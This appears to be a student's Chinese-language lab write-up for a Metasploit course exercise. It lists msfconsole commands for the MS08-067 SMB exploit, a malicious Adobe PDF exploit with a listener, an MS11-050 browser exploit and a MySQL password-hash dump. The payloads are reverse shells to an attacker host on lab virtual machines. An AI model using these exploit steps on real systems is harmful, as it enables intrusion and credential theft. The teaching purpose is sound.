20155337《网络对抗》Exp5 MSF基础应用

20155337《网络对抗》Exp5 MSF基础应用

实践目标

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067;

1.2 一个针对浏览器的攻击,如ms11_050;

1.3 一个针对客户端的攻击,如Adobe;

1.4 成功应用任何一个辅助模块。

一、基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

  • exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。
  • payload:payload
    病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做“有效负载”(payload)。payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。
  • encode:encode是编码,实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

二、实验内容

1、1.Windows服务渗透攻击——MS08-067安全漏洞

①攻击机:kali ②靶机:windows XP SP3(English)

在kali中输入msfconsole,然后依次输入一下命令:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109//攻击机ip

msf exploit(ms08_067_netapi) > set LPORT 5337 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.111//靶机ip,特定漏洞端口已经固定

msf exploit(ms08_067_netapi) >set target 0//自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //攻击

建立会话,攻击成功;

2.针对Office软件的渗透攻击——MS10-087

①攻击机:kali ②靶机:windowsXP Professional sp2 ③Office版本:2003
kali输入msfconsole进入控制台
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.1.109 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5337 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20155337.pdf//设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击

将生成的pdf文件拷贝到靶机上。

在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.1.109 //攻击机ip
msf exploit(handler) > set LPORT 5337
exploit

在靶机上打开201553337.pdf文件

攻击成功:

3.辅助模块的应用:auxiliary/scanner/mysql/mysql_hashdump

msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set RHOSTS 192.168.1.111
msf auxiliary(mysql_hashdump) > set PASSWORD qjw
msf auxiliary(mysql_hashdump) > set USERNAME qjw
msf auxiliary(mysql_hashdump) > set THREADS 100
msf auxiliary(mysql_hashdump) > exploit

4.浏览器渗透攻击——MS11-050

①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0

在kali中输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.1.109 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5337 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 20155337 //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit

在浏览器输入http://192.168.1.109:8080/VDPKYzlYD
,IE出现弹窗,警告遇到问题需关闭程序:

攻击失败!

posted @ 2018-05-03 22:55  Twe1vE  阅读(188)  评论(0编辑  收藏